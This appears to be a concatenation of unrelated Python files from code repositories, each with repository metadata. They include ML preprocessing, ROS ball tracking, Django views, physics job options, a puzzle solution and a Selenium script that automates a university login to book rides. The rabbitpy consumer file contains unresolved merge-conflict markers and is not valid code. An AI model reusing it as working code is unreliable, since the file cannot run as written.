def create_testcnn_data(df, num_words=50000, maxlen=128):
# 对于label处理
mlb = MultiLabelBinarizer()
y = mlb.fit_transform(df.label.apply(lambda label: label.split()))
with open(LABELS_FILE, mode='w', encoding='utf-8') as f:
for label in mlb.classes_:
f.write(label+'\n')
# 对content处理
tokenizer = Tokenizer(num_words=num_words, oov_token="<UNK>")
tokenizer.fit_on_texts(df.content.tolist())
x = tokenizer.texts_to_sequences(df.content)
x = pad_sequences(x, maxlen=maxlen, padding='post', truncating='post') # padding
# 保存数据
np.save(X_NPY, x)
np.save(Y_NPY, y)
print('已创建并保存x,y至:\n {} \n {}'.format(X_NPY, Y_NPY))
# 同时还要保存tokenizer和 multi_label_binarizer
# 否则训练结束后无法还原把数字还原成文本
tb = {'tokenizer': tokenizer, 'binarizer': mlb} # 用个字典来保存
with open(TOKENIZER_BINARIZER, 'wb') as f:
pickle.dump(tb, f)
print('已创建并保存tokenizer和binarizer至:\n {}'.format(TOKENIZER_BINARIZER))
def load_testcnn_data():
"""
如果分开保存,那要保存6个文件太麻烦了。
所以采取读取之后划分数据集的方式
"""
# 与之前的bert同步
x = np.load(X_NPY).astype(np.float32)
y = np.load(Y_NPY).astype(np.float32)
# 与之前bert的划分方式统一
train_x, test_x, train_y, test_y = train_test_split(x, y, test_size=0.2, random_state=2020)
train_x, dev_x, train_y, dev_y = train_test_split(train_x, train_y, test_size=0.2, random_state=2020)
return train_x, dev_x, test_x, train_y, dev_y, test_y
def load_tokenizer_binarizer():
"""
读取tokenizer 和 binarizer
:return:
"""
with open(TOKENIZER_BINARIZER, 'rb') as f:
tb = pickle.load(f)
return tb['tokenizer'], tb['binarizer']
def main():
"""
合并以上所有操作
"""
data_path = unzip_data() # 解压
df = combine_data(data_path) # 合并
df = extract_label(df) # 提取标签
# 对于bert的预处理
create_bert_data(df)
# 对于testcnn和transformer的预处理
df = df_preprocess(df) # 切词,分词,去停用词
create_testcnn_data(df, num_words=50000, maxlen=128)
if __name__ == '__main__':
main()
| [
"435786117@qq.com"
] | 435786117@qq.com |
c83ec7fd080ab59cb5a297a0e3c0d169d74b5cfd | e3b36f1b8cbf64e50000b2f2720be2c6bdf57e66 | /scripts/track_ball_demo.py | db918fe70cffc4175f6d1c4f998f9ab095030a61 | [] | no_license | ketaro-m/foosball_robot | 5da7c9269c6e5663c635b964432f6e8bf56c8833 | f149f73bd3759ece3ad8d26f8ad969b4cbb8351f | refs/heads/main | 2023-04-11T03:30:18.830499 | 2021-04-24T09:30:51 | 2021-04-24T09:30:51 | 318,946,388 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,675 | py | #!/usr/bin/env python
import rospy
import sys
import cv2
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
# parameters you need to fill in depending on the camera setting
field_area = [[37, 55], [605, 405]] # [[top-left x,y], [bottom-right x, y]]
# obtain from hsv.py
hsv_lower = np.array([20, -10, 100])
hsv_upper = np.array([50, 64, 300])
median_size = 7 # filter size for median filter
morpho_size = 13 # filter size for morphology processing
field_contour = [field_area[0],
[field_area[0][0],
field_area[1][1]],
field_area[1],
[field_area[1][0], field_area[0][1]]]
class cvBridgeDemo:
def __init__(self):
global field_contour
self.field = field_contour
self.stencil_flag = False # not to make stencil more than once
self.centers = []
self.node_name = "cv_bridge_demo"
rospy.init_node(self.node_name)
rospy.on_shutdown(self.cleanup)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("image_rect_color", Image, self.image_callback, queue_size=1)
def image_callback(self, ros_image):
try:
frame = self.bridge.imgmsg_to_cv2(ros_image, "bgr8")
except CvBridgeError, e:
print e
input_image = np.array(frame, dtype=np.uint8)
self.process_image(input_image, True)
print(self.circles)
cv2.waitKey(1)
def process_image(self, image, debug=False):
# hsv filter
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, hsv_lower, hsv_upper)
if (not self.stencil_flag):
self.stencil_flag = True
self.stencil = np.zeros(mask.shape).astype(mask.dtype)
cv2.fillConvexPoly(self.stencil, np.array(self.field), [255, 255, 255])
mask = cv2.bitwise_and(mask, self.stencil)
if debug:
display = cv2.bitwise_and(image, image, mask= mask)
cv2.imshow("hsv filter", display)
global median_size
mask = cv2.medianBlur(mask,median_size)
# morphology processing
global morpho_size
kernel=cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(morpho_size,morpho_size))
mask = cv2.dilate(mask,kernel,iterations = 1)
mask = cv2.erode(mask,kernel,iterations = 1)
if debug:
display = cv2.bitwise_and(image, image, mask= mask)
cv2.imshow("morphology processing", display)
# make contour
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if (len(contours) == 0):
if debug:
display = image.copy()
cv2.imshow("ball region", display)
return
max_cnt = max(contours, key=lambda x: cv2.contourArea(x))
out = np.zeros_like(mask)
cv2.drawContours(out, [max_cnt], -1, color=255, thickness=-1)
# cv2.imshow("out", out)
mask = out
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if debug:
display = cv2.bitwise_and(image, image, mask= mask)
cv2.imshow("largest area", display)
# if debug:
# display = np.zeros(mask.shape, dtype=np.uint8)
# for c in contours:
# for elem in c:
# display[elem[0,1],elem[0,0]]=255
# cv2.imshow("make contours", display)
# make region
circles = []
for contour in contours:
(x,y),radius = cv2.minEnclosingCircle(contour)
center = (int(x),int(y))
radius = int(radius)
circles.append({"center":center, "radius":radius})
if debug:
display=image.copy()
cv2.rectangle(display, tuple(field_area[0]),tuple(field_area[1]), (0, 255, 0))
for i in range(5):
x = (field_area[1][0]-field_area[0][0])/6*(i+1) + field_area[0][0]
cv2.line(display,(x,field_area[0][1]),(x,field_area[1][1]),(0,255,0))
for i in range(2):
y = (field_area[1][1]-field_area[0][1])/3*(i+1) + field_area[0][1]
cv2.line(display,(field_area[0][0],y),(field_area[1][0],y),(0,255,0))
for circle in circles:
cv2.circle(display,circle["center"],circle["radius"],(0,0,255),2)
cv2.imshow("ball region", display)
self.circles = circles
def cleanup(self):
cv2.destroyAllWindows()
if __name__ == '__main__':
cvBridgeDemo()
rospy.spin()
| [
"keitaro.mrkm@gmail.com"
] | keitaro.mrkm@gmail.com |
8d48291882527bb16ae0f9179d387647b961b5cf | 2e7b7462659b7e9f6a02e000423f02e656458f84 | /website/views.py | 93afce8a31846d1868a7a08bc8bcd5423ab18cec | [] | no_license | jonlazaro/LinkedStats-Web | 144d2ce4d4a4c57976882aff7dd709da79b2ef54 | 63e5916c3315cfbe5678a654690792131fda190e | refs/heads/master | 2021-03-12T20:40:24.345161 | 2013-05-22T09:23:35 | 2013-05-22T09:23:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,344 | py | # coding: utf-8
from django.shortcuts import render_to_response, get_object_or_404
from rdflib import Namespace
from django.utils.encoding import smart_str
from django.template import RequestContext
from datetime import datetime
from django.http import Http404, HttpResponse
from sets import Set
from utils import *
import os
import json
GEONAMES_CODES = {
'A': 'country, state, region, ...',
'H': 'stream, lake, ...',
'L': 'parks, area, ...',
'P': 'city, village, ...',
'R': 'road, railroad',
'S': 'spot, building, farm',
'T': 'mountain, hill, rock, ...',
'U': 'undersea',
'V': 'forest, heath, ...'
}
#JSON_PATH = os.path.abspath(os.path.join(os.getcwd(), 'municipality_geonames.json'))
JSON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../municipality_geonames.json'))
MUNICIPALITY_DICT = json.load(open(JSON_PATH))
def index(request):
details={}
kg_waste_person_mun_year, details['kg_waste_person_mun_year_query'] = get_total_waste_per_person_year_all_municipalities()
details['kg_waste_person_mun_year'] = json.dumps(kg_waste_person_mun_year)
details['municipality_points'] = MUNICIPALITY_LATLNG_DICT
return render_to_response('index.html', details, context_instance=RequestContext(request))
def doc(request):
return render_to_response('doc.html', context_instance=RequestContext(request))
def municipality_search(request):
details={}
municipality_official_names = Set()
for key, val in MUNICIPALITY_DICT.items():
if val[1]:
municipality_official_names.add(key)
details['all_municipality_names'] = sorted(list(municipality_official_names))
return render_to_response('municipality_search.html', details, context_instance=RequestContext(request))
def municipality(request, municipality_name):
details={}
try:
geonames_uri = MUNICIPALITY_DICT[municipality_name][0]
except KeyError:
raise Http404
kg_person_year, details['kg_person_year_query'] = get_kg_per_person_year_municipality(geonames_uri)
details['kg_person_year'] = json.dumps(kg_person_year)
kg_wastetype_year, details['kg_wastetype_year_query'] = get_wastekg_by_wastetype_municipality_year(geonames_uri)
details['kg_wastetype_year'] = json.dumps(kg_wastetype_year)
avg_kg_person_year, details['avg_kg_person_year_query'] = get_avg_kg_per_person_year_biscay()
details['avg_kg_person_year'] = json.dumps(avg_kg_person_year)
details['municipality_info'], details['extra_info_queries'] = get_extra_info_about_municipality(geonames_uri)
if not details['municipality_info']['name']:
details['municipality_info']['name'] = municipality_name
details['municipality_info']['lat'] = MUNICIPALITY_LATLNG_DICT[geonames_uri]["lat"]
details['municipality_info']['long'] = MUNICIPALITY_LATLNG_DICT[geonames_uri]["long"]
details['population_year'], details['population_year_query'] = get_population_year_municipality(geonames_uri)
return render_to_response('municipality.html', details, context_instance=RequestContext(request))
def population(request):
details = {}
details['population'], details['population_query'] = get_population_whole_biscay()
return render_to_response('population.html', details, context_instance=RequestContext(request))
| [
"lazaro.jon@gmail.com"
] | lazaro.jon@gmail.com |
4cb105211199b388e964f55bb905a04d35572cf9 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/LArCalorimeter/LArTest/LArConditionsTest/share/FixLArElecCalib_fix6_jobOptions.py | 59efd81bb72cab9f075cafd0a9f3b68c0147137b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,813 | py | ###############################################################
#
# Job options file 1
#
#==============================================================
#use McEventSelector
include( "AthenaCommon/Atlas_Gen.UnixStandardJob.py" )
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOn()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
from AthenaCommon.GlobalFlags import GlobalFlags
GlobalFlags.DataSource.set_geant4()
GlobalFlags.InputFormat.set_pool()
GlobalFlags.DetGeo.set_atlas()
DetDescrVersion = "ATLAS-CSC-02-00-00"
# DetDescrVersion = "ATLAS-DC3-05"
# LArIdMapFix=7
# G4Phys ="QGSP_EMV"
# G4Phys ="QGSP_BERT"
# Switches:
# items
RunNumber = 1
#
RecreateFolder = False
WriteIOV = True
# Objects and its tag
ObjectList = []
TagList = []
# FIX
if DetDescrVersion == "ATLAS-CSC-02-00-00" :
TagNameForFix = "CSC02-F"
else :
TagNameForFix = "Wrong"
print " ERROR: wrong DetDescrVersion"
ObjectList += ["LArNoiseMC#LArNoise#/LAR/ElecCalibMC/Noise"]
ObjectList += ["LAruA2MeVMC#LAruA2MeV#/LAR/ElecCalibMC/uA2MeV"]
ObjectList += ["LArDAC2uAMC#LArDAC2uA#/LAR/ElecCalibMC/DAC2uA"]
ObjectList += ["LArRampMC#LArRamp#/LAR/ElecCalibMC/Ramp"]
TagList += ["LARElecCalibMCNoise-"+TagNameForFix]
TagList += ["LARElecCalibMCuA2MeV-"+TagNameForFix]
TagList += ["LARElecCalibMCDAC2uA-"+TagNameForFix]
TagList += ["LARElecCalibMCRamp-"+TagNameForFix]
OutputPOOLFileName = "LArFCalADC2MeV_13.0.30_v1.pool.root"
#/--------------------------------------------------------------
# Algorithm to fix the LAr Id, if needed
#/-------------------------------
theApp.Dlls += [ "LArConditionsTest" ]
theApp.TopAlg += [ "FixLArElecCalib" ]
FixLArElecCalib = Algorithm("FixLArElecCalib")
# 1=
# 2=fix for IdMapFix=1
# 3=new fsample for CSC-02
# 5=new FCAL noise and minbias
FixLArElecCalib.FixFlag =6
#--------------------------------------------------------------
# Private Application Configuration options
#--------------------------------------------------------------
theApp.Dlls += [ "LArTools" ]
include ("AtlasGeoModel/SetGeometryVersion.py")
include ("AtlasGeoModel/GeoModelInit.py")
# Other LAr related
include( "LArIdCnv/LArIdCnv_joboptions.py" )
include( "CaloDetMgrDetDescrCnv/CaloDetMgrDetDescrCnv_joboptions.py" )
include( "IdDictDetDescrCnv/IdDictDetDescrCnv_joboptions.py" )
include( "LArConditionsCommon/LArConditionsCommon_MC_jobOptions.py" )
include( "LArConditionsCommon/LArIdMap_MC_jobOptions.py" )
#--------------------------------------------------------------
EventSelector = Service( "EventSelector" )
EventSelector.RunNumber=1
#EventSelector.EventsPerRun=10;
EventSelector.EventsPerRun=2
EventSelector.FirstEvent=1
# theApp.Dlls += [ "PoolSvc", "AthenaPoolCnvSvc", "AthenaPoolCnvSvcPoolCnv", "EventAthenaPoolPoolCnv", "EventSelectorAthenaPool" ]
include( "AthenaPoolCnvSvc/AthenaPool_jobOptions.py" )
theApp.Dlls += [ "AthenaPoolCnvSvc" ]
theApp.Dlls += [ "LArCondAthenaPoolPoolCnv" ]
include( "AthenaSealSvc/AthenaSealSvc_joboptions.py" )
# AthenaSealSvc.CheckDictAtInit = True
include ("LArRawConditions/LArRawConditionsDict_joboptions.py")
# include ("LArTools/LArToolsDict_joboptions.py")
theApp.EvtMax=1
AthenaEventLoopMgr=Service("AthenaEventLoopMgr")
AthenaEventLoopMgr.OutputLevel = INFO
MessageSvc = Service( "MessageSvc" )
MessageSvc.OutputLevel = INFO
MessageSvc.defaultLimit = 1000000;
MessageSvc.Format = "% F%20W%S%7W%R%T %0W%M"
theApp.Dlls += [ "GaudiAud" ]
theAuditorSvc = AuditorSvc()
theAuditorSvc.Auditors = [ "ChronoAuditor" ]
##############################################
# Writing POOL and COOL
if len(ObjectList)>0 :
# include regstration alg (default is WriteIOV = False)
include("RegistrationServices/OutputConditionsAlg_jobOptions.py")
# List of objects container type#key#foldername
OutputConditionsAlg.ObjectList = ObjectList
OutputConditionsAlg.IOVTagList = TagList
ToolSvc = Service("ToolSvc")
ToolSvc.ConditionsAlgStream.OutputFile = OutputPOOLFileName
# Set flag to register and run interval Run1/Event1 to Run2/Event2
# Usually, only need to set Run1, others go to default
####
OutputConditionsAlg.WriteIOV = WriteIOV
OutputConditionsAlg.Run1 = 0
OutputConditionsAlg.LB1 = 0
# Set the connection string
include ( "IOVDbSvc/IOVDbSvc_jobOptions.py" )
IOVDbSvc = Service( "IOVDbSvc" )
IOVDbSvc.dbConnection="impl=cool;techno=sqlite;schema=LArElecCalib_FCalADC2MeV.db;X:OFLP200"
# For schema creation - only should be used when creating the folder,
# i.e. the first time
IOVRegSvc = Service( "IOVRegistrationSvc" )
IOVRegSvc.OutputLevel = DEBUG
IOVRegSvc.RecreateFolders = RecreateFolder
# PoolSvc.FileOpen = "update"
###########################################################################
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
86e96ae863d4f9f1817fcae036de87f3df2a15ec | e694891ff8c9d06df7b7b5def7ba71c1dba03aa8 | /rabbitmq_rabbitpy/test_rabbitmq.py | 23f166795359b1166e1d5e54aa4a636cf2e3c2e1 | [] | no_license | wangyu190810/python-skill | 78f9abb39ebfa01b92ffb2ec96c7ef57c490d68d | 719d082d47a5a82ce4a15c57dd481932a9d8f1ba | refs/heads/master | 2020-04-05T17:43:48.005145 | 2019-02-01T01:45:49 | 2019-02-01T01:45:49 | 41,524,479 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | # -*-coding:utf-8-*-
# email:190810401@qq.com
__author__ = 'wangyu'
<<<<<<< HEAD
=======
import rabbitpy
# with rabbitpy.Connection("amqp://guest:guest@localhost:5672/%2F") as conn:
# with conn.channel() as channel:
# amqp = rabbitpy.AMQP(channel)
#
# for message in amqp.basic_consume('queue-name'):
# print(message)
#
# import rabbitpy
with rabbitpy.Connection('amqp://guest:guest@localhost:5672/%2f') as conn:
with conn.channel() as channel:
queue = rabbitpy.Queue(channel, 'example')
while len(queue) > 0:
message = queue.get()
print 'Message:'
print ' ID: %s' % message.properties['message_id']
print ' Time: %s' % message.properties['timestamp'].isoformat()
print ' Body: %s' % message.body
message.ack()
print 'There are %i more messages in the queue' % len(queue)
>>>>>>> 85e7424cf14daa2d8af9040031bec995ac70cde1
| [
"190810401@qq.com"
] | 190810401@qq.com |
6b84c5e4c27b70e319288ef6a0d7c5d40daa977f | 904c83d2063d624f0bc9cd328df0c97640786794 | /hw1/model_rnn.py | 0c26fa533f81fc2818b47add4cc659dfa33095d8 | [] | no_license | b04901066/ADLxMLDS2017 | dae194f0ea6c804b8cc3cf8a08b037025fc40bb9 | 5987c22f2a6fee6c8cbeae686c080ece895a25d8 | refs/heads/master | 2021-03-19T12:36:12.437429 | 2018-01-07T02:45:35 | 2018-01-07T02:45:35 | 106,443,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,524 | py | import sys
import csv
import numpy
import pandas
from collections import OrderedDict
import keras
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout, Activation
from keras.layers import TimeDistributed
from keras.layers import LSTM
from keras.preprocessing import sequence
from keras.optimizers import SGD
# fix random seed for reproducibility
# numpy.random.seed(7)
features = 108
# readin
# train.ark (1124823, 70+39) test.ark (180406, 70)
X_temp = pandas.read_csv(sys.argv[1]+'fbank/train.ark', sep=' ', header=None).values
X_temp2 = pandas.read_csv(sys.argv[1]+'mfcc/train.ark', sep=' ', header=None).values
X_temp = numpy.append( X_temp, X_temp2[:, 1:], axis=1)
# train.lab (1124823, 2)
y_temp = pandas.read_csv(sys.argv[1]+'label/train.lab', sep=',', header=None).values
map48phone_char = pandas.read_csv(sys.argv[1]+'48phone_char.map', sep='\t', header=None).values
d48tonum = OrderedDict( zip(map48phone_char[:,0], map48phone_char[:,1]) )
# aligning
d1 = OrderedDict( zip(X_temp[:,0], numpy.zeros(X_temp.shape[0])) )
d2 = OrderedDict( zip(y_temp[:,0], y_temp[:,1]) )
d1.update(d2)
y_temp = numpy.array( list( d1.values() ) )
# mapping
for i in range(y_temp.shape[0]):
y_temp[i] = d48tonum.get(str(y_temp[i]))
y_temp = y_temp.astype(numpy.int16)
# reshape
wav_count = 1
for i in range(X_temp.shape[0]):
X_temp[i, 0] = int(str(X_temp[i, 0]).split('_')[2])
for i in range(X_temp.shape[0]-1):
if X_temp[i, 0] > X_temp[i+1, 0] :
wav_count = wav_count + 1
max_time = int(numpy.amax(X_temp[:,0]))
X = numpy.zeros((wav_count, max_time, features), numpy.float)
y = numpy.zeros((wav_count, max_time, 1 ), numpy.int16)
count = 0
for i in range(X_temp.shape[0]-1):
if X_temp[i, 0] > X_temp[i+1, 0] or i == (X_temp.shape[0]-2) :
flame = X_temp[i, 0]
X_resh = numpy.reshape(X_temp[( i+1- flame) : (i+1), 1: ], (1, flame, features))
y_resh = numpy.reshape(y_temp[( i+1- flame) : (i+1) ] , (1, flame, 1))
zerofeatures = numpy.zeros((1, max_time-flame, features), numpy.float)
zero1 = numpy.ones((1, max_time-flame, 1 ), numpy.int16) * 37
# numpy.repeat( numpy.reshape( y_resh[0, flame-1,:], (1, 1, 1)), max_time-flame, axis=1)
X[count] = numpy.append( X_resh , zerofeatures, axis=1)
y[count] = numpy.append( y_resh , zero1 , axis=1)
count = count + 1
X_train = numpy.copy(X)
y_train = keras.utils.to_categorical( y , 48 )
y_train = numpy.reshape(y_train, (X_train.shape[0], X_train.shape[1], 48))
# for debugging
print('X(samples, timesteps, input_dim):', X_train.shape)
print('--------------------------------')
print('y(samples, timesteps, output_dim):', y_train.shape)
print('--------------------------------')
# Start training
model = Sequential()
# model.add(Embedding(features, output_dim=256))
model.add(LSTM(1024,
# input_length=TIME_STEPS, input_dim=INPUT_SIZE
input_shape=(X_train.shape[1], X_train.shape[2]),
batch_size=16,
return_sequences=True,
stateful=True))
model.add(Dropout(0.2))
model.add(LSTM(1024, return_sequences=True))
model.add(Dropout(0.2))
model.add(TimeDistributed(Dense(48, activation='softmax')))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])
print(model.summary())
model.fit(X_train, y_train, epochs=2, batch_size=16)
model.save(sys.argv[2]) | [
"noreply@github.com"
] | b04901066.noreply@github.com |
96307be001607af1db86c041f17a8a334756c5dc | 0bcdf50443ce11216b2ca7651e18bba1fb27542d | /algorithm/BAEKJOON/20056.py | 381d10f0c840f0cdf146647baa3366b4467c5d14 | [] | no_license | qqyurr/TIL | d4bdf75bbec8c4140d8d898dfba4823de3bf3ce0 | efb689c2dcaaf1cfc1ff429e29fdb7294a770d2a | refs/heads/master | 2023-07-19T11:48:56.732651 | 2021-09-07T09:10:29 | 2021-09-07T09:10:29 | 280,100,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,276 | py | from collections import deque
import sys
sys.stdin = open('20056.txt')
dx = [-1, -1, 0, 1, 1, 1, 0, -1]
dy = [0, 1, 1, 1, 0, -1, -1, -1]
n, m, k = map(int, input().split())
q = deque()
a = [[deque() for _ in range(n)] for _ in range(n)]
for _ in range(m):
r, c, m, s, d = map(int, input().split())
a[r-1][c-1].append([m, s, d])
q.append([r-1, c-1])
for _ in range(k):
temp = []
qlen = len(q)
for _ in range(qlen):
x, y = q.popleft()
for _ in range(len(a[x][y])):
m, s, d = a[x][y].popleft()
nx = (s * dx[d] + x) % n
ny = (s * dy[d] + y) % n
q.append([nx, ny])
# 다음 좌표가 저장된 파이어볼
temp.append([nx, ny, m, s, d])
# 하나씩 불러와서 지도에 저장
for x, y, m, s, d in temp:
a[x][y].append([m, s, d])
for i in range(n):
for j in range(n):
# 좌표의 파이어볼이 겹치는 경우
if len(a[i][j]) > 1:
nm, ns, odd, even, flag = 0, 0, 0, 0, 0
for idx, [m, s, d] in enumerate(a[i][j]):
nm += m
ns += s
if idx == 0:
if d % 2 == 0:
even = 1
else:
odd = 1
else:
# even인데 홀수가 들어올경우
if even == 1 and d % 2 == 1:
flag = 1
# odd 인데 짝수가 들어오는 경우
elif odd == 1 and d % 2 == 0:
flag = 1
nm //= 5
ns //= len(a[i][j])
# 원래 파이어볼이 있던 자리 0으로 만들기
a[i][j] = deque()
# 질량이 0이 아니면 flag대로 좌표에 새로운 파이어볼 append
if nm != 0:
for idx in range(4):
nd = 2 * idx if flag == 0 else 2 * idx + 1
a[i][j].append([nm, ns, nd])
ans = 0
for i in range(n):
for j in range(n):
if a[i][j]:
for m, s, d in a[i][j]:
ans += m
print(ans) | [
"byyulli16@gmail.com"
] | byyulli16@gmail.com |
956b9ac7c34d007a7dc6d93c3d72f38c6fb20462 | d1ad5480919e7931566a6c581b289c8a834742ee | /day 052.py | 6ed3ae9b1672eafb21e8ad93ced939da89ee74d7 | [] | no_license | saraalrumih/100DaysOfCode | d92ae6add4cbbcab4fdfd3aa8579346bd2b678a0 | 12d7f44ce72cbda3722042a6b0956903256a8816 | refs/heads/master | 2020-07-06T22:10:21.421058 | 2019-10-27T16:14:48 | 2019-10-27T16:14:48 | 203,153,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | # datetime
import datetime as t
print("current date and time is: ",t.datetime.now())
print("current year is: ",t.datetime.now().year)
print("today is: ",t.datetime.now().strftime("%A")) | [
"361205433@qu.edu.sa"
] | 361205433@qu.edu.sa |
0c50d34d854feeffa085fafba16a05290be2289e | 687956ef9e06ff0e6571de732032f3833be4671c | /Motzkin/wsgi.py | 6c7a8917e5e704f254acc14d49d2731b7708f680 | [] | no_license | sgino209/cmr_django | e4e69f8bac5f45e013977bfb6c2f41e6db87cffe | cce65ffda45ecb14bb58a39bb6aa11a81661d589 | refs/heads/master | 2020-03-07T15:47:07.181033 | 2018-12-28T06:55:45 | 2018-12-28T06:55:45 | 127,564,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | # (c) Shahar Gino, April-2018, sgino209@gmail.com
#
# WSGI config for Motzkin project.
# It exposes the WSGI callable as a module-level variable named ``application``.
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Motzkin.settings")
application = get_wsgi_application()
#Add static serving using whitenoise
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
| [
"noreply@github.com"
] | sgino209.noreply@github.com |
2b8ce93b4d397094a5f26ecd9b7517cd250b1515 | 923be7428b2a0d7920e53d2f87a1e65720ee0a8d | /tapride.py | 9899c40fb7877a94280568993fa02ffcda9e06b6 | [] | no_license | shaeqahmed/tapride_terminal | 0b10020974a563928f64917a7ef320f5dae0d894 | c57a2d37d5174f1b5c3dfd307173b0d68cf6c9ba | refs/heads/master | 2021-05-08T12:22:01.073799 | 2018-02-02T07:03:01 | 2018-02-02T07:03:01 | 119,943,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,292 | py | from selenium import webdriver
import getpass
import os, time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.remote.webdriver import WebDriver
def WebElement_click(self):
self._parent.execute_script("arguments[0].click();", self)
WebElement.click = WebElement_click
def WebDriver_find_element_by_xpath(self, x):
x = WebDriverWait(self, 10).until(
EC.presence_of_element_located((By.XPATH, x))
)
return x
WebDriver.find_element_by_xpath = WebDriver_find_element_by_xpath
os.system('cls' if os.name == 'nt' else 'clear')
print("####### ###### ")
print(" # ## ##### # # # ##### ###### ")
print(" # # # # # # # # # # # ")
print(" # # # # # ###### # # # ##### ")
print(" # ###### ##### # # # # # # ")
print(" # # # # # # # # # # ")
print(" # # # # # # # ##### ######\n ")
chromedriver = "<INSERT PATH TO CHROMEDRIVER EXECUTABLE>"
os.environ["webdriver.chrome.driver"] = chromedriver
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = '/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary'
driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
word = getpass.getpass("UMICH Password:")
pickup_addr = input("\nWhat is your pickup location?\n")
dropoff_addr = input("\nWhat is your dropoff location?\n")
for i in range(3):
try:
driver.get("https://tapride-umich.herokuapp.com/ride/")
login = driver.find_element_by_xpath('//*[@id="ride-wrapper"]/div[8]/div/div[1]/div/button')
login.click()
login = driver.find_element_by_xpath('/html/body/a')
login.click()
user = driver.find_element_by_xpath('//*[@id="login"]')
user.send_keys("<CHANGE TO UNIQNAME>")
passw = driver.find_element_by_xpath('//*[@id="password"]')
passw.send_keys(word)
submit = driver.find_element_by_xpath('//*[@id="loginSubmit"]')
submit.click()
time.sleep(1)
request = driver.find_element_by_xpath('//button[text()="REQUEST RIDE"]')
request.click()
pickup = driver.find_element_by_xpath('//*[@id="pickup-location-input"]')
pickup.send_keys(pickup_addr)
choice = driver.find_element_by_xpath('/html/body/div[3]/div[2]/ul/li[1]/span')
choice.click()
dropoff = driver.find_element_by_xpath('//*[@id="dropoff-location-input"]')
dropoff.send_keys(dropoff_addr)
time.sleep(1)
choice = driver.find_element_by_xpath('/html/body/div[3]/div[2]/ul/li[1]/span')
choice.click()
order = driver.find_element_by_xpath('//*[@id="ride-wrapper"]/div[8]/div/div[6]/div[2]/button')
order.click()
order = driver.find_element_by_xpath('//*[@id="ride-wrapper"]/div[9]/div/div[7]/div[2]/button')
print("\n"+order.text+" DONE")
order.click()
driver.quit()
break
except:
print("\nHold up retrying..")
driver.quit()
driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options)
| [
"shaeqahmed@gmail.com"
] | shaeqahmed@gmail.com |
8820d893612534fb30bc6e6550996ec98b34c200 | 3f9f05433dde1e33d66689733b2ce891c8d35247 | /blog/migrations/0002_auto_20210224_1055.py | fda3e600254bb2895f561278e9ea3f73c7fca32d | [] | no_license | xiejiaqi77/personal_portfolio_project_fomal | 43fd28fab5e94a8f467b474a9a37ea44cea52b74 | 1a7c7f527ede26f960f93c9418e09137807dc3ff | refs/heads/main | 2023-03-07T11:30:38.176231 | 2021-02-28T08:07:58 | 2021-02-28T08:07:58 | 342,579,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | # Generated by Django 3.1.7 on 2021-02-24 10:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('date', models.DateField()),
],
),
migrations.DeleteModel(
name='Project',
),
]
| [
"xiejiaqi77.job@gmail.com"
] | xiejiaqi77.job@gmail.com |
be626dc75c2e4e659d9d6d88ed5ec75010b1efb4 | 493315999125ea93f20b0a49aa63a2cd0092c068 | /gru-lm/train.py | d540d339e36ab6c6d73290f2ab35dd1f641f2503 | [] | no_license | cfifty/quotationGeneration | 3c5af5aa84d2a53054fbefeecd7f63f04f0cb219 | 66c8079139e6fe1e1128c7f38560ec7bc4287c3e | refs/heads/master | 2020-03-08T23:27:32.632058 | 2018-06-16T03:06:05 | 2018-06-16T03:06:05 | 128,464,737 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,680 | py | #! /usr/bin/env python
import sys
import os
import time
import numpy as np
from utils import *
from datetime import datetime
from gru_theano import GRUTheano
